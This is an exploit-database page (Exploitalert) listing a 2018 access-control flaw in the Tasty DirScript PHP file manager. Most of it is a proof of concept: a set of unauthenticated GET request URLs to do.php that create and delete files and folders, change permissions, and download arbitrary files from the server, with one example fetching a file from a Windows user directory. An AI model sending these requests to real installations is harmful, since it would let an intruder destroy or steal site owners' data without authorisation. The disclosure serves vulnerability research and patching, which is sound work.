Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-284 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2018-08-10 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02196 | 0.49976 |
[+] Exploit Title ; Tasty DirScript All Version Insecure Direct Object Refrences vulnerability [+] Date : 2018-08-10 [+] Author : Work LearninG [+] Vendor Homepage : http://www.p30script.ir/1257-%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%A7%D8%B3%DA%A9%D8%B1%DB%8C%D9%BE%D8%AA-%D9%81%D8%A7%DB%8C%D9%84-%D9%85%D9%86%DB%8C%D8%AC%D8%B1-tastydir.html [+] Version : All Version [+] Dork : N/A [+] My Site : https://worklearning.ir [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : [email protected] [+] Description : [!] Tasty dir is file manager. [+] Poc : [!] Mkdir : http://localhost/sc/_tastydir/do.php?mkdir=dir name [!] deletefile : http://localhost/sc/_tastydir/do.php?delf=Your File Name [!] Delete Folder : http://localhost/sc/_tastydir/do.php?delfld=Your Directory Name [!] Chmod : http://localhost/sc/_tastydir/do.php?chmod=Your File Name [!] Get File Size : http://localhost/sc/_tastydir/do.php?getsize=Your File Name [!] Get Info : http://localhost/sc/_tastydir/do.php?getinfo=Your File Name [!] Download File : http://localhost/sc/_tastydir/do.php?download=C:\Users/0P3N3R/Desktop/df.txt [+] Security Level : [!] High [+] Exploitation Technique: [!] remote [+] Request Method : [!] GET [+] Vulnerability Link : [*] http://localhost/sc/_tastydir/do.php?download=C:\Users/0P3N3R/Desktop/df.txt [+] Vulnerable File : [!] do.php [+] We Are : [+] 0P3N3R [+]
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.